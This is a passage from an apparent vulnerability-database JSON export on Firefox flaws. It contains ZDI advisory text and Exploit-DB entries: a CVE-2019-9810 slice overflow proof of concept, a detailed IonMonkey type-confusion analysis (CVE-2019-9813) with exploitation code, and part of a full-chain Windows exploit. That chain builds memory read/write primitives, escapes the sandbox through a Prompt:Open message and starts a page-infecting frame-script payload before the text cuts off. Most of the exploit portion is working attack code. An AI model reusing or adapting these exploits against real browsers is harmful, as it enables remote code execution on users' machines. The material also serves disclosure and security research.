Out-Of-Bounds Write Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-06-22T11:39:57", "bulletinFamily": "info", "cvelist": ["CVE-2019-9813"], "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Mozilla Firefox. 
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within IonMonkey. The issue results from the lack of proper validation of user-supplied data, which can result in a type confusion condition. An attacker can leverage this vulnerability to execute code in the context of the current process.", "edition": 1, "modified": "2019-06-22T00:00:00", "published": "2019-04-15T00:00:00", "id": "ZDI-19-365", "href": "https://www.zerodayinitiative.com/advisories/ZDI-19-365/", "title": "(Pwn2Own) Mozilla Firefox IonMonkey Optimizer Type Confusion Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2019-03-26T15:27:27", "description": "", "published": "2019-03-26T00:00:00", "type": "exploitdb", "title": "Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9810"], "modified": "2019-03-26T00:00:00", "id": "EDB-ID:46605", "href": "https://www.exploit-db.com/exploits/46605", "sourceData": "<script>\r\n\r\nlet size = 64;\r\n\r\ngarr = [];\r\nj = 0;\r\nfunction gc(){\r\n\tvar tmp = [];\r\n\tfor(let i = 0;i < 0x20000;i++){\r\n\t\ttmp[i] = new Uint32Array(size * 2);\r\n\t\tfor(let j = 0;j < (size*2);j+=2){\r\n\t\t\ttmp[i][j] = 0x12345678;\r\n\t\t\ttmp[i][j+1] = 0xfffe0123;\r\n\t\t}\r\n\t}\r\n\tgarr[j++] = tmp;\r\n}\r\n\r\nlet arr = [{},2.2];\r\n\r\nlet obj = {};\r\n\r\nobj[Symbol.species] = function(){\r\n\tvictim.length = 0x0;\r\n\tfor(let i = 0;i < 0x2000;i++){\r\n\t\tgvictim[i].length = 0x0;\r\n\t\tgvictim[i] = null;\r\n\t}\r\n\tgc();\r\n\t//Array.isArray(garr[0][0x10000]);\r\n\treturn [1.1];\r\n}\r\n\r\nlet gvictim = [];\r\n\r\nfor(let i = 0;i < 0x1000;i++){\r\n\tgvictim[i] = [1.1,2.2];\r\n\tgvictim[i].length = size;\r\n\tgvictim[i].fill(3.3);\r\n}\r\n\r\nlet victim = [1.1,2.2];\r\nvictim.length = 
size;\r\nvictim.fill(3.3);\r\n\r\nfor(let i = 0x1000;i < 0x2000;i++){\r\n\tgvictim[i] = [1.1,2.2];\r\n\tgvictim[i].length = size;\r\n\tgvictim[i].fill(3.3);\r\n}\r\n\r\nfunction fake(arg){\r\n}\r\nfor(let i = 0;i < size;i++){\r\n\tfake[\"x\"+i.toString()] = 2.2;\r\n}\r\n\r\nfunction jit(){\r\n\tvictim[1] = 1.1;\r\n\tarr.slice();\r\n\t//fake.x2 = 6.17651672645e-312;\r\n\treturn victim[2];\r\n}\r\n\r\nflag = 0;\r\n\r\n\r\nfor(let i = 0;i < 0x10000;i++){\r\n\txx = jit();\r\n}\r\n\r\narr.constructor = obj;\r\n\r\nArray.isArray(victim);\r\nalert(333);\r\nalert(jit());\r\n</script>", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46605"}, {"lastseen": "2019-04-03T18:03:22", "description": "", "published": "2019-04-03T00:00:00", "type": "exploitdb", "title": "SpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types (Type Confusion)", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9813"], "modified": "2019-04-03T00:00:00", "id": "EDB-ID:46646", "href": "https://www.exploit-db.com/exploits/46646", "sourceData": "A bug in IonMonkey leaves type inference information inconsistent, which in turn allows the compilation of JITed functions that cause type confusions between arbitrary objects.\r\n\r\n# Prerequisites\r\n\r\nIn Spidermonkey, every JavaScript object is an instance of the JSObject class [1]. Plain JavaScript objects (e.g. ones created through an object literal) are typically instances of the NativeObject [2] class. A NativeObject is basically:\r\n\r\n* An ObjectGroup [3] which stores things like the prototype and type information for properties (see below)\r\n* The Shape [4] of the object which indicates the location of properties. A Shape could e.g. tell that property .p is stored in the 2nd property slot\r\n* Property storage [5]: a dynamically sized array in which the property values are stored. 
The Shapes provide indices into this array\r\n* Element storage [6]: a dynamically sized array in which elements (properties with an integer key) are stored\r\n\r\nSpidermonkey makes use of type inference to perform various optimizations in the JIT. Specifically, type inference is used to predict the types of object properties and then omit runtime type checks for them. Such a type inference system for property values is only safe as long as every property store to an object validates that the type of the new value is consistent with the existing type information or, if not, updates (\"widens\") the inferred type. In Spidermonkey's interpreter this is done in e.g. AddOrChangeProperty [7]. In the JIT compiler (IonMonkey), this is done through \"type barriers\" [8]: small runtime type checks that ensure the written value is consistent with what is stored as inferred type and otherwise bail out from the JITed code.\r\n\r\n# Crashing Testcase\r\n\r\nThe following program, found through fuzzing and then manually modified, crashes Spidermonkey with an assertion that verifies that type inference data is consistent with the actual values stored as properties:\r\n\r\n function hax(o, changeProto) {\r\n if (changeProto) {\r\n o.p = 42;\r\n o.__proto__ = {};\r\n }\r\n o.p = 13.37;\r\n return o;\r\n }\r\n\r\n for (let i = 0; i < 1000; i++) {\r\n hax({}, false);\r\n }\r\n\r\n for (let i = 0; i < 10000; i++) {\r\n let o = hax({}, true);\r\n eval('o.p'); \t\t\t// Crash here\r\n }\r\n\r\n\r\nCrashes in debug builds of Spidermonkey with:\r\n\r\n Assertion failure: [infer failure] Missing type in object [Object * 0x327f2ca0aca0] p: float, at js/src/vm/TypeInference.cpp:265\r\n Hit MOZ_CRASH() at js/src/vm/TypeInference.cpp:266\r\n\r\nThis assertion expresses that type inference data is inconsistent for the property .p as the type \"float\" is not in the list of possible types but the property currently holds a float value.\r\n\r\n# Bug Analysis\r\n\r\nIn essence it appears that 
IonMonkey fails to realize that the ObjectGroup of the object `o` can change throughout the function (specifically during the prototype change) and thus incorrectly omits a type barrier for the second property assignment, leading to inconsistent type inference information after the property assignment.\r\n\r\nIn detail, the following appears to be happening:\r\n\r\nThe first loop runs and allocates NativeObjects with ObjectGroup OG1 and Shape S1. After some iterations the function hax is JIT compiled. At that point, the compiled code will expect to be called with an object of ObjectGroup OG1 as input. OG1 will have inferred types {.p: [float]} because the body of the if condition was never executed and so property .p was never set to a non-float value.\r\n\r\nThen the second loop starts running, which will allocate objects using a new ObjectGroup, OG2 (I'm not exactly sure why it's a new one here, most likely some kind of heuristic) but still using Shape S1. As such, the compiled code for hax will be invalidated [9]. Then, during the first invocation of hax with changeProto == true, a new prototype will be set for o, which will\r\n\r\n1. cause a new ObjectGroup to be allocated for O (because prototypes are stored in the object group) and\r\n2. cause the previous object group (OG2) to discard any inferred types and set the state of inferred properties to unknown [10]. An ObjectGroup with unknownProperties is then never again used for type inference of properties [11].\r\n\r\nAt a later point in the loop, the function is recompiled, but this time it is compiled to expect an object of ObjectGroup OG1 or OG2 as input. 
The JIT compiled code for hax will now look something like this (pseudocode):\r\n\r\n // Verify that the input is an object with ObjectGroup OG1 or OG2 (actually\r\n // this check is performed before entering the JITed code)\r\n VerifyInputTypes\r\n\r\n if (changeProto) {\r\n // A SetProperty [12] inline cache [13] which will perform the actual\r\n // property store and speed up subsequent property stores on objects of\r\n // the same Shape and Group. Since a type barrier is required, the Group\r\n // is used as an additional index into the cache so that both Shape and\r\n // Group must match, in which case no inferred types could be\r\n // accidentially invalidated.\r\n SetPropertyICWithTypeBarrier o.p 42\r\n\r\n Call ChangePrototype(o, {})\r\n }\r\n\r\n // Another inline cache to store property .p again, but this time without a\r\n // type barrier. As such, only the Shape will be checked and not the Group.\r\n SetPropertyIC o.p 13.37\r\n\r\n Return o\r\n\r\nAfter compilation finishes, the following happens in the first invocation of the JITed code:\r\n\r\n* The function is called with an object of ObjectGroup OG2 and Shape S1\r\n* The property .p is stored on the object in the first SetProperty cache. 
This does not update any inferred type as OG2 does not use inferred types\r\n* The prototype of o is changed\r\n * This again causes a new ObjectGroup, OG3, to be allocated\r\n * When creating the new group, property types are inferred from the current object (this is possible because it is the only object using the new group) [14]\r\n * As such, o now has an ObjectGroup OG3 with inferred types {.p: [int]}\r\n* The second property store cache runs into a cache miss (because it is empty at this point)\r\n * Execution transfers to the slow path (a runtime property store)\r\n * This will store the property and update the inferred types of OG3 to {.p: [int, float]}\r\n * It will then update the inline cache to now directly handle property stores to objects with shape S1\r\n * Because this SetPropertyIC is not marked as requiring a type barrier, the cache only guards on the Shape, not the Group [15]\r\n\r\nThen, in the second invocation of the JITed code:\r\n\r\n* As above, a new ObjectGroup OG4 is allocated for o with inferred types {.p: [int]} when changing the prototype\r\n* The second SetPropertyIC now runs into a cache hit (because it only looks at the Shape which is still S1)\r\n* It then directly writes the property value into the property slot without updating inferred types\r\n\r\nAs such, after the second invocation the returned object is one whose ObjectGroup (OG4) states that the property .p must be an integer but it really is a float. At this time, any validation of inferred types will crash with an assertion as happens during the runtime property lookup of .p in the call to eval().\r\n\r\nThe core issue here is that the second property store was marked as not requiring a type barrier. To understand why, it is necessary to look into the logic determining whether a property write should be guarded with a type barrier, implemented in jit::PropertyWriteNeedsTypeBarrier [16]. The logic of that function is roughly:\r\n\r\n1. 
Iterate over the set of possible object types, in this case that is OG1 and OG2\r\n2. For every group, check whether storing a value of type T (in this case float) would violate inferred property types\r\n\t- In this case, OG1 already has the correct type for property .p, so no violation there\r\n\t- And OG2 does not even track property types, so again no violation [17]\r\n3. If no violations were found, no type barrier is needed\r\n\r\nThe problem is that PropertyWriteNeedsTypeBarrier operates on the possible ObjectGroups of the input object at the beginning of the function which are not necessarily the same as at the time the property store is performed. As such, it fails to realize that the input object can actually have an ObjectGroup (in this case OG4) that has inferred property types that would be violated by the property write. It then falsely determines that a type barrier is not needed, leading to the scenario described above.\r\n\r\n# Exploitation\r\n\r\nExploitation of this type of vulnerability comes down to JIT compiling a function in such a way that the compiler makes use of type inference data to omit runtime type checks. Afterwards a type confusion between arbitrary objects can be achieved.\r\n\r\nThe following code demonstrates this by setting the inferred type to Uint8Array but actually storing an object with controlled property values (overlapping with internal fields of a Uint8Array) in the property. It then compiles code (the function pwn) to omit type checks on the property value based on its inferred types, thus treating the custom object as a Uint8Array and crashing when reading from 0x414141414141:\r\n\r\n let ab = new ArrayBuffer(1024);\r\n\r\n function hax(o, changeProto) {\r\n // The argument type for |o| will be object of group OG1 or OG2. OG1 will\r\n // have the inferred types {.p: [Y]}. OG2 on the other hand will be an\r\n // ObjectGroup with unknown property types due to the prototype change. 
As\r\n // such, OG2 will never have any inferred property types.\r\n\r\n // Ultimately, this code will confuse types X and Y with each other.\r\n // Type X: a Uint8Array\r\n let x = new Uint8Array(1024);\r\n // Type Y: a unboxed object looking a bit like a Uint8Array but with controlled data... :)\r\n let y = {slots: 13.37, elements: 13.38, buffer: ab, length: 13.39, byteOffset: 13.40, data: 3.54484805889626e-310};\r\n\r\n if (changeProto) {\r\n o.p = x;\r\n\r\n // This prototype change will cause a new ObjectGroup, OG_N, to be\r\n // allocated for o every time it is executed (because the prototype is\r\n // stored in the ObjectGroup). During creation of the new ObjectGroup,\r\n // the current property values will be used to infer property types. As\r\n // such, OG_N will have the inferred types {.p: [X]}.\r\n o.__proto__ = {};\r\n }\r\n\r\n // This property write was not marked as requiring type barriers to\r\n // validate the consistency of inferred property types. The reason is that\r\n // for OG1, the property type is already correct and OG2 does not track\r\n // property types at all. However, IonMonkey failed to realize that the\r\n // ObjectGroup of o could have changed in between to a new ObjectGroup that\r\n // has different inferred property types. As such, the type barrier\r\n // omission here is unsafe.\r\n //\r\n // In the second invocation, the inline cache for this property store will\r\n // then be a hit (because the IC only uses the Shape to index the cache,\r\n // not the Group). 
As such, the inferred types associated with the\r\n // ObjectGroup for o will not be updated and will be left inconsistent.\r\n o.p = y;\r\n\r\n return o;\r\n }\r\n\r\n function pwn(o, trigger) {\r\n if (trigger) {\r\n // Is on a code path that wasn't executed in the interpreter so that\r\n // IonMonkey solely relies on type inference instead of type profiles\r\n // from the interpreter (which would show the real type).\r\n return o.p[0];\r\n } else {\r\n return 42;\r\n }\r\n }\r\n\r\n // \"Teach\" the function hax that it should accept objects with ObjectGroup OG1.\r\n // This is required as IonMonkey needs to have at least one \"known\" type when\r\n // determining whether it can omit type barriers for property writes:\r\n // https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6282\r\n for (let i = 0; i < 10000; i++) {\r\n hax({}, false);\r\n }\r\n\r\n // Compile hax to trigger the bug in such a way that an object will be created\r\n // whose ObjectGroup indicates type X for property .p but whose real type will\r\n // be Y, where both X and Y can be arbitrarily chosen.\r\n let evilObj;\r\n for (let i = 0; i < 10000; i++) {\r\n evilObj = hax({}, true);\r\n\r\n // Not sure why this is required here, it maybe prevents JITing of the main\r\n // script or similar...\r\n eval('evilObj.p');\r\n }\r\n\r\n // JIT compile the second function and make it rely on the (incorrect) type\r\n // inference data to omit runtime type checks.\r\n for (let i = 0; i < 100000; i++) {\r\n pwn(evilObj, false);\r\n }\r\n\r\n // Finally trigger a type confusion.\r\n pwn(evilObj, true);\r\n\r\nNote, this way of exploiting the issue requires UnboxedObjects [18] which have recently been disabled by default [19]. However, the bug itself does not require UnboxedObjects and can be exploited in other ways. UnboxedObjects are just the most (?) 
convenient way.\r\n\r\n[1] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.h#L54\r\n[2] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L463\r\n[3] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/ObjectGroup.h#L87\r\n[4] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/Shape.h#L37\r\n[5] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L466\r\n[6] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L469\r\n[7] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1448\r\n[8] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.h#L10254\r\n[9] https://blog.mozilla.org/javascript/2012/10/15/the-ins-and-outs-of-invalidation/\r\n[10] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.cpp#L2219\r\n[11] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/TypeInference.cpp#L2946\r\n[12] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/IonIC.h#L280\r\n[13] https://www.mgaudet.ca/technical/2018/6/5/an-inline-cache-isnt-just-a-cache\r\n[14] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1259\r\n[15] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/CacheIR.cpp#L3544\r\n[16] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6268\r\n[17] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6293\r\n[18] 
https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.h#L187\r\n[19] https://github.com/mozilla/gecko-dev/commit/26965039e60a00b3600ce2e6a559106e4a3a30ca\r\n\r\n Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=1538120\r\n\r\n\r\n Fixed in https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/#CVE-2019-9813 (bug collision with a pwn2own entry)\r\n\r\nThe issue was fixed in two ways:\r\n\r\n1. in https://github.com/mozilla/gecko-dev/commit/0ff528029590e051baa60265b3af92a632a7e850 the code that adds inferred properties after a prototype change (step `* When creating the new group, property types are inferred from the current object` above) was changed to no longer create inferred property types when coming from Groups marked as having unknownProperties. As such, in this case the new ObjectGroups created from OG2 would now all have unknownProperties as well.\r\n\r\n2. in https://github.com/mozilla/gecko-dev/commit/f8ce40d176067800e5dda013fb4d8ff9e91d9a88 the function responsible for determining whether write barriers can be omitted (jit::PropertyWriteNeedsTypeBarrier) was modified to always emit write barriers if one of the input groups has unknownProperties.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/46646"}, {"lastseen": "2019-12-09T06:27:08", "description": "", "published": "2019-12-07T00:00:00", "type": "exploitdb", "title": "Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9810", "CVE-2019-11708"], "modified": "2019-12-07T00:00:00", "id": "EDB-ID:47752", "href": "https://www.exploit-db.com/exploits/47752", "sourceData": "// Axel '0vercl0k' Souchet - November 19 2019\r\n\r\n// EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47752.zip\r\n\r\n// 0:000> ? 
xul!sAutomationPrefIsSet - xul\r\n// Evaluate expression: 85724947 = 00000000`051c0f13\r\nconst XulsAutomationPrefIsSet = 0x051c0f13n;\r\n// 0:000> ? xul!disabledForTest - xul\r\n// Evaluate expression: 85400792 = 00000000`05171cd8\r\nconst XuldisabledForTest = 0x05171cd8n;\r\n\r\nconst Debug = false;\r\nconst dbg = p => {\r\n if(Debug == false) {\r\n return;\r\n }\r\n\r\n print(`Debug: ${p}`);\r\n};\r\n\r\nconst ArraySize = 0x5;\r\nconst WantedArraySize = 0x42424242;\r\n\r\nlet arr = null;\r\nlet Trigger = false;\r\nconst Spray = [];\r\n\r\nfunction f(Special, Idx, Value) {\r\n arr[Idx] = 0x41414141;\r\n Special.slice();\r\n arr[Idx] = Value;\r\n}\r\n\r\nclass SoSpecial extends Array {\r\n static get [Symbol.species]() {\r\n return function() {\r\n if(!Trigger) {\r\n return;\r\n }\r\n\r\n arr.length = 0;\r\n for(let i = 0; i < 0x40000; i++) {\r\n Spray.push(new Uint32Array(ArraySize));\r\n }\r\n };\r\n }\r\n};\r\n\r\nfunction GetMeBiggie() {\r\n for(let Idx = 0; Idx < 0x100000; Idx++) {\r\n Spray.push(new Uint32Array(ArraySize));\r\n }\r\n\r\n const SpecialSnowFlake = new SoSpecial();\r\n for(let Idx = 0; Idx < 10; Idx++) {\r\n arr = new Array(0x7e);\r\n Trigger = false;\r\n for(let Idx = 0; Idx < 0x400; Idx++) {\r\n f(SpecialSnowFlake, 0x70, Idx);\r\n }\r\n\r\n Trigger = true;\r\n f(SpecialSnowFlake, 47, WantedArraySize);\r\n if(arr.length != 0) {\r\n continue;\r\n }\r\n\r\n const Biggie = Spray.find(e => e.length != ArraySize);\r\n if(Biggie != null) {\r\n return Biggie;\r\n }\r\n }\r\n\r\n return null;\r\n}\r\n\r\nfunction ExploitCVE_2019_9810() {\r\n print = console.log;\r\n\r\n const Biggie = GetMeBiggie();\r\n if(Biggie == null || Biggie.length != WantedArraySize) {\r\n dbg('Failed to set things up :(.');\r\n return false;\r\n }\r\n\r\n //\r\n // Scan for one of the Uint32Array we sprayed earlier.\r\n //\r\n\r\n let Biggie2AdjacentSize = null;\r\n const JSValueArraySize = 0xfffa000000000000n | BigInt(ArraySize);\r\n for(let Idx = 0; Idx < 0x100; Idx++) {\r\n 
const Qword = BigInt(Biggie[Idx]) << 32n | BigInt(Biggie[Idx + 1]);\r\n if(Qword == JSValueArraySize) {\r\n Biggie2AdjacentSize = Idx + 1;\r\n break;\r\n }\r\n }\r\n\r\n if(Biggie2AdjacentSize == null) {\r\n dbg('Failed to find an adjacent array :(.');\r\n return false;\r\n }\r\n\r\n //\r\n // Use the array length as a marker.\r\n //\r\n\r\n const AdjacentArraySize = 0xbbccdd;\r\n Biggie[Biggie2AdjacentSize] = AdjacentArraySize;\r\n\r\n //\r\n // Find the array now..\r\n //\r\n\r\n const AdjacentArray = Spray.find(\r\n e => e.length == AdjacentArraySize\r\n );\r\n\r\n if(AdjacentArray == null) {\r\n dbg('Failed to find the corrupted adjacent array :(.');\r\n return false;\r\n }\r\n\r\n const ReadPtr = Addr => {\r\n const SizeInDwords = 2;\r\n const SavedSlot = [\r\n Biggie[Biggie2AdjacentSize],\r\n Biggie[Biggie2AdjacentSize + 2 + 2],\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1]\r\n ];\r\n\r\n //\r\n // Corrupt the `AdjacentArray`'s size / data slot.\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = SizeInDwords;\r\n Biggie[Biggie2AdjacentSize + 2 + 2] = Number(Addr & 0xffffffffn);\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = Number(Addr >> 32n);\r\n\r\n //\r\n // Read arbitrary location now.\r\n //\r\n\r\n const Ptr = BigInt.fromUint32s([AdjacentArray[0], AdjacentArray[1]]);\r\n\r\n //\r\n // Restore the `AdjacentArray`'s size / data slot.\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = SavedSlot[0];\r\n Biggie[Biggie2AdjacentSize + 2 + 2] = SavedSlot[1];\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = SavedSlot[2];\r\n return Ptr;\r\n };\r\n\r\n const WritePtr = (Addr, Value) => {\r\n const SizeInDwords = 2;\r\n const SavedSlot = [\r\n Biggie[Biggie2AdjacentSize],\r\n Biggie[Biggie2AdjacentSize + 2 + 2],\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1]\r\n ];\r\n\r\n //\r\n // Corrupt the `AdjacentArray`'s size / data slot.\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = SizeInDwords;\r\n Biggie[Biggie2AdjacentSize + 2 + 2] = Number(Addr & 0xffffffffn);\r\n 
Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = Number(Addr >> 32n);\r\n\r\n //\r\n // Write to arbitrary location now.\r\n //\r\n\r\n AdjacentArray[0] = Number(Value & 0xffffffffn);\r\n AdjacentArray[1] = Number(Value >> 32n);\r\n\r\n //\r\n // Restore the `AdjacentArray`'s size / data slot.\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = SavedSlot[0];\r\n Biggie[Biggie2AdjacentSize + 2 + 2] = SavedSlot[1];\r\n Biggie[Biggie2AdjacentSize + 2 + 2 + 1] = SavedSlot[2];\r\n return true;\r\n };\r\n\r\n const AddrOf = Obj => {\r\n AdjacentArray.hell_on_earth = Obj;\r\n // 0:000> dqs 1ae5716e76a0\r\n // 00001ae5`716e76a0 00001ae5`7167dfd0\r\n // 00001ae5`716e76a8 000010c5`8e73c6a0\r\n // 00001ae5`716e76b0 00000238`9334e790\r\n // 00001ae5`716e76b8 00007ff6`6be55010 js!emptyElementsHeader+0x10\r\n // 00001ae5`716e76c0 fffa0000`00000000\r\n // 00001ae5`716e76c8 fff88000`00bbccdd\r\n // 0:000> !telescope 0x00002389334e790\r\n // 0x000002389334e790|+0x0000: 0xfffe1ae5716e7640 (Unknown)\r\n const SlotOffset = Biggie2AdjacentSize - (3 * 2);\r\n const SlotsAddress = BigInt.fromUint32s(\r\n Biggie.slice(SlotOffset, SlotOffset + 2)\r\n );\r\n\r\n return BigInt.fromJSValue(ReadPtr(SlotsAddress));\r\n };\r\n\r\n //\r\n // Let's move the battle field to the TenuredHeap\r\n //\r\n\r\n const ArrayBufferLength = 10;\r\n const AB1 = new ArrayBuffer(ArrayBufferLength);\r\n const AB2 = new ArrayBuffer(ArrayBufferLength);\r\n const AB1Address = AddrOf(AB1);\r\n const AB2Address = AddrOf(AB2);\r\n\r\n dbg(`AddrOf(AB1): ${AB1Address.toString(16)}`);\r\n dbg(`AddrOf(AB2): ${AB2Address.toString(16)}`);\r\n WritePtr(AB1Address + 0x28n, 0xfff8800000010000n);\r\n WritePtr(AB2Address + 0x28n, 0xfff8800000010000n);\r\n\r\n if(AB1.byteLength != AB2.byteLength && AB1.byteLength != 0x10000) {\r\n dbg('Corrupting the ArrayBuffers failed :(.');\r\n return false;\r\n }\r\n\r\n const Primitives = BuildPrimitives(AB1, AB2);\r\n Math.atan2(AB2);\r\n\r\n //\r\n // All right, time to clean up behind ourselves.\r\n // 
Let's fix AdjacentArray's size first (as we are using Biggie to do it).\r\n //\r\n\r\n Biggie[Biggie2AdjacentSize] = ArraySize;\r\n\r\n //\r\n // Let's fix Biggie's length as we are done with it.\r\n // 0:000> !smdump_jsvalue 0xfffe11e6fa2f7580\r\n // Detected xul.dll, using it as js module.\r\n // 11e6fa2f7580: js!js::TypedArrayObject: Type: Uint32Array\r\n // 11e6fa2f7580: js!js::TypedArrayObject: Length: 1337\r\n // 11e6fa2f7580: js!js::TypedArrayObject: ByteLength: 5348\r\n // 11e6fa2f7580: js!js::TypedArrayObject: ByteOffset: 0\r\n // 11e6fa2f7580: js!js::TypedArrayObject: Content: Uint32Array({Length:1337, ...})\r\n // @$smdump_jsvalue(0xfffe11e6fa2f7580)\r\n //\r\n // 0:000> !telescope 0x11e6fa2f7580\r\n // 0x000011e6fa2f7580|+0x0000: 0x000006a0415c37f0 (Unknown) -> 0x00007ff93e106830 (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (Ascii(Uint32Array))\r\n // 0x000011e6fa2f7588|+0x0008: 0x000006a041564100 (Unknown) -> 0x000006a041583cc0 (Unknown) -> 0x00007ff93e106830 (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (xul.dll (.rdata)) -> 0x00007ff93e2f66ce (Ascii(Uint32Array))\r\n // 0x000011e6fa2f7590|+0x0010: 0x0000000000000000 (Unknown)\r\n // 0x000011e6fa2f7598|+0x0018: 0x00007ff93e0f41d8 (xul.dll (.rdata)) -> 0xfff9800000000000 (Unknown)\r\n // 0x000011e6fa2f75a0|+0x0020: 0xfffe11e6fa2f70c0 (Unknown)\r\n // 0x000011e6fa2f75a8|+0x0028: 0xfff8800000000539 (Unknown)\r\n //\r\n\r\n const BiggieLengthAddress = Primitives.AddrOf(Biggie) + 0x28n;\r\n Primitives.WritePtr(BiggieLengthAddress, 0xfff8800000000000n | BigInt(ArraySize));\r\n\r\n //\r\n // From there, we're kinda done - let's get god mode and fuck off.\r\n //\r\n\r\n GodMode(AB1, AB2, Primitives, XulsAutomationPrefIsSet, XuldisabledForTest);\r\n return true;\r\n}\r\n\r\n//\r\n// This function uses a `Sandbox` with a `System Principal` to be able to grab the\r\n// `docShell` object off the `window` object. 
Once it has it, it can grab the frame\r\n// `messageManager` that we need to trigger the sandbox escape.\r\n//\r\n\r\nfunction GetContentFrameMessageManager(Win) {\r\n function _GetDocShellFromWindow(Win) {\r\n return Win.docShell;\r\n }\r\n\r\n const { Services } = Components.utils.import('resource://gre/modules/Services.jsm');\r\n const Cu = Components.utils;\r\n const Sbx = Cu.Sandbox(Services.scriptSecurityManager.getSystemPrincipal());\r\n const Code = _GetDocShellFromWindow.toSource();\r\n Cu.evalInSandbox(Code, Sbx);\r\n const DocShell = Sbx._GetDocShellFromWindow(Win);\r\n Cu.nukeSandbox(Sbx);\r\n return DocShell.messageManager;\r\n}\r\n\r\n//\r\n// This function sends a 'Prompt:Open' message over the frame message manager IPC,\r\n// with an URI.\r\n//\r\n\r\nfunction PromptOpen(Uri) {\r\n const FrameMM = GetContentFrameMessageManager(window);\r\n const Result = FrameMM.sendSyncMessage('Prompt:Open', { uri: Uri });\r\n return Result;\r\n}\r\n\r\n//\r\n// This is the function that abuses the `Prompt:Open` message to re-exploit the parent\r\n// process and escape the sandbox.\r\n//\r\n\r\nfunction TriggerCVE_2019_11708() {\r\n PromptOpen(`${location.origin}?stage3`);\r\n}\r\n\r\n//\r\n// This is the function that gets written into the frame script the exploit drops\r\n// on disk. A trick to debug this code is to pop-up a `Browser Toolbox` as well as a\r\n// `Browser Content toolbox` and execute the following in the `Browser Toolbox`:\r\n// Services.mm.loadFrameScript('file://frame-script.js', true)\r\n// This should break in the `Browser Content Toolbox` debugger window.\r\n//\r\n\r\nfunction FrameScriptPayload() {\r\n function PimpMyDocument() {\r\n\r\n //\r\n // Don't infect doar-e and leave Cthulhu alone...\r\n //\r\n\r\n if(content.document.location.origin == 'https://doar-e.github.io' ||\r\n content.document.location.origin == 'http://localhost:8000') {\r\n return;\r\n }\r\n\r\n //\r\n // .. 
